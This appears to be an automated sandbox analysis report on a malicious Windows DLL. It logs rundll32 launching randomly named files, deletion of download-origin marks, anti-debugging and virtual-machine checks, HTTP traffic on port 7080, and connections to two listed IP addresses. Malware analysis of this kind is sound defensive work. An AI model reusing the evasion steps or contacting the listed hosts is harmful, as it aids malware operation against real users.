                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hbjpd\usib.lxs',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hlqxmsfzi\jjvjowsk.xoz',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bdtgy\atyx.hvl',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cfwgvspim\fwvopxwu.wpy',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ibbigqfuoubc\tiynxefumvm.jsi',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aziiwkqaqp\dnweyyfur.lyr',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uchtpmhcpt\nfuoltapn.fge',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zvrxg\husq.avr',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jcoinynbga\etdgpznst.qoo',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bfurjavtsbwkajdv\sfvtpwqlhvedlny.xdk',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Msjhyngbojq\bihctgwrjw.jsh',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mntpro\pwmgi.sow',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sioetxuvrihjyxu\wsarziebmecgqp.weo',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jvotvplywpzb\qwoawgsuzao.fmz',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ofqhxlaxbkixqlny\iogmsr.ktr',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usfyyrevasc\hoztidaylv.ruq',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wzvizgyhx\mlhiyaxu.lik',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tthpthgifqmjjt\idvrfaaidqwxo.flr',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jdedkdp\loyrno.rpx',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwmln\clyk.jxd',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                    Source: zGeK5so94c.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: aqmjrtmCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000003.00000002.673102798.0000000002E72000.00000004.00000010.sdmp
                    Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
                    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
                    Source: Binary string: wntdll.pdb source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
                    Source: Binary string: apphelp.pdb source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
                    Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E100B push ss; iretd
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F547F46 push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F5478D6 push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445F1F7 push es; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0461F1F7 push es; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Hbjpd\pixmxoo.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Hbjpd\pixmxoo.dllJump to dropped file

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Hbjpd\usib.lxs:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Hbjpd\usib.lxs:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Hlqxmsfzi\jjvjowsk.xoz:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Bdtgy\atyx.hvl:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Cfwgvspim\fwvopxwu.wpy:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ibbigqfuoubc\tiynxefumvm.jsi:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Aziiwkqaqp\dnweyyfur.lyr:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Uchtpmhcpt\nfuoltapn.fge:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Zvrxg\husq.avr:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jcoinynbga\etdgpznst.qoo:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Bfurjavtsbwkajdv\sfvtpwqlhvedlny.xdk:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Msjhyngbojq\bihctgwrjw.jsh:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Mntpro\pwmgi.sow:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Sioetxuvrihjyxu\wsarziebmecgqp.weo:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jvotvplywpzb\qwoawgsuzao.fmz:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ofqhxlaxbkixqlny\iogmsr.ktr:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Usfyyrevasc\hoztidaylv.ruq:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Wzvizgyhx\mlhiyaxu.lik:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Tthpthgifqmjjt\idvrfaaidqwxo.flr:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jdedkdp\loyrno.rpx:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Mwmln\clyk.jxd:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Oxuscqjzcbk\nutudjdnrb.pvg:Zone.Identifier read attributes | delete
                    Uses known network protocols on non-standard portsShow sources
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 7080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7080 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 7080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7080 -> 49750
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F546987 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                    Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F541CE0 Sleep,CreateToolhelp32Snapshot,GetLastError,Sleep,GetModuleFileNameW,PathFindFileNameW,Module32FirstW,Module32NextW,Module32NextW,FindCloseChangeNotification,Sleep,Module32NextW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,OpenProcess,QueryFullProcessImageNameW,CloseHandle,__ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ,std::ios_base::_Ios_base_dtor,
                    Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                    Source: C:\Windows\System32\svchost.exe TID: 1848Thread sleep time: -180000s >= -30000s
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F558C1D FindFirstFileExA,
                    Source: WerFault.exe, 00000003.00000002.673636328.0000000004CA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.725933870.000001FBFCD40000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.740940384.00000269B6940000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.780829637.000001D9CB800000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: svchost.exe, 0000000E.00000002.779226551.000001D9CA884000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWp
                    Source: svchost.exe, 0000000E.00000002.779508154.000001D9CA8EA000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                    Source: WerFault.exe, 00000003.00000002.673636328.0000000004CA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.725933870.000001FBFCD40000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.740940384.00000269B6940000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.780829637.000001D9CB800000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: WerFault.exe, 00000003.00000002.673636328.0000000004CA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.725933870.000001FBFCD40000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.740940384.00000269B6940000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.780829637.000001D9CB800000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: WerFault.exe, 00000003.00000002.673636328.0000000004CA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.725933870.000001FBFCD40000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.740940384.00000269B6940000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.780829637.000001D9CB800000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformation
                    Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                    Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F54CF38 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F541CE0 Sleep,CreateToolhelp32Snapshot,GetLastError,Sleep,GetModuleFileNameW,PathFindFileNameW,Module32FirstW,Module32NextW,Module32NextW,FindCloseChangeNotification,Sleep,Module32NextW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,OpenProcess,QueryFullProcessImageNameW,CloseHandle,__ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ,std::ios_base::_Ios_base_dtor,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E3278 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EF811 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F54ED6E mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447F811 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0446C005 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445EC16 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FF811 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479F811 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0462C005 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0461EC16 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F559BB5 GetProcessHeap,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F54CF38 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F547D7E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F547A38 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    System process connects to network (likely due to code injection or exploit)Show sources
                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 203.157.152.9 168
                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 190.55.186.229 80
